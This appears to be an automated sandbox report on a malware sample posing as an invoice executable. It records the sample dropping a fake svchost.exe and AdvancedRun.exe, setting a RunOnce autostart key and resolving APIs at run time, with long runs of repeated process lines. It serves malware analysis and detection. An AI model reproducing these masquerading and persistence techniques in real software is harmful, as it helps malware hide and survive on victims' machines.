Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_0040289F

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Static PE information: real checksum: 0x1422c should be: 0x3f3d1
Source: svchost.exe.0.dr	Static PE information: real checksum: 0x1422c should be: 0x3f3d1

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_010F17DB push FFFFFF83h; ret	0_2_010F17DD
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_0040B550 push eax; ret	10_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_0040B550 push eax; ret	10_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_0040B50D push ecx; ret	10_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_0040B550 push eax; ret	11_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_0040B550 push eax; ret	11_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_0040B50D push ecx; ret	11_2_0040B51D

Source: initial sample	Static PE information: section name: .text entropy: 6.86065163545
Source: initial sample	Static PE information: section name: .text entropy: 6.86065163545

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\explorer.exe

Executable created and started: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe			Jump to dropped file
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe			Jump to dropped file

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

10_2_00401306

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

10_2_00408E31

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
